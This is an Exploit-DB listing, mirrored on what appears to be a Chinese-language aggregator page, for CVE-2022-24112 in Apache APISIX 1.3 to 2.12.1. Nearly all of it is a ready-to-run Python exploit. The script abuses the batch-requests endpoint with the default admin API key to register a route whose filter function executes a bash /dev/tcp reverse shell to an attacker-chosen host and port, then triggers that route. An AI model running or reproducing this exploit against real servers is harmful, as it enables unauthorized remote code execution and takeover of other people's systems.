Apache APISIX 2.12.1 – Remote Code Execution (RCE)

• Exploit Database
• 17 阅读

• 作者： Ven3xy
  日期： 2022-03-16
• 类别：

  • remote
  平台：

  • multiple
• 来源：https://www.exploit-db.com/exploits/50829/

• # Exploit Title: Apache APISIX 2.12.1 - Remote Code Execution (RCE)
  # Date: 2022-03-16
  # Exploit Author: Ven3xy
  # Vendor Homepage: https://apisix.apache.org/
  # Version: Apache APISIX 1.3 – 2.12.1
  # Tested on: CentOS 7
  # CVE : CVE-2022-24112
  
  
  import requests
  import sys
  
  class color:
  HEADER = '\033[95m'
  IMPORTANT = '\33[35m'
  NOTICE = '\033[33m'
  OKBLUE = '\033[94m'
  OKGREEN = '\033[92m'
  WARNING = '\033[93m'
  RED = '\033[91m'
  END = '\033[0m'
  UNDERLINE = '\033[4m'
  LOGGING = '\33[34m'
  color_random=[color.HEADER,color.IMPORTANT,color.NOTICE,color.OKBLUE,color.OKGREEN,color.WARNING,color.RED,color.END,color.UNDERLINE,color.LOGGING]
  
  
  def banner():
  run = color_random[6]+'''\n . , 
  _.._ * __*\./ ____ \./._ | _ *-+-
   (_][_)|_) |/'\ (/,/'\[_)|(_)| | 
  | |
  \n'''
  run2 = color_random[2]+'''\t\t(CVE-2022-24112)\n''' 
  run3 = color_random[4]+'''{ Coded By: Ven3xy| Github: https://github.com/M4xSec/ }\n\n'''
  print(run+run2+run3)
  
  if (len(sys.argv) != 4):
  banner()
  print("[!] Usage : ./apisix-exploit.py <target_url> <lhost> <lport>")
  exit()
  
  else:
  banner()
  target_url = sys.argv[1]
  lhost = sys.argv[2]
  lport = sys.argv[3]
  
  headers1 = {
  'Host': '127.0.0.1:8080',
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
  'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
  'Accept': '*/*',
  'Accept-Encoding': 'gzip, deflate',
  'Content-Type': 'application/json',
  'Content-Length': '540',
  'Connection': 'close',
  }
  
  headers2 = {
  'Host': '127.0.0.1:8080',
  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36 Edg/97.0.1072.69',
  'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
  'Accept': '*/*',
  'Accept-Encoding': 'gzip, deflate',
  'Content-Type': 'application/json',
  'Connection': 'close',
  }
  
  json_data = {
  'headers': {
  'X-Real-IP': '127.0.0.1',
  'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1',
  'Content-Type': 'application/json',
  },
  'timeout': 1500,
  'pipeline': [
  {
  'path': '/apisix/admin/routes/index',
  'method': 'PUT',
  'body': '{"uri":"/rms/fzxewh","upstream":{"type":"roundrobin","nodes":{"schmidt-schaefer.com":1}},"name":"wthtzv","filter_func":"function(vars) os.execute(\'bash -c \\\\\\"0<&160-;exec 160<>/dev/tcp/'+lhost+'/'+lport+';sh <&160 >&160 2>&160\\\\\\"\'); return true end"}',
  },
  ],
  }
  
  response1 = requests.post(target_url+'apisix/batch-requests', headers=headers1, json=json_data, verify=False)
  
  response2 = requests.get(target_url+'rms/fzxewh', headers=headers2, verify=False)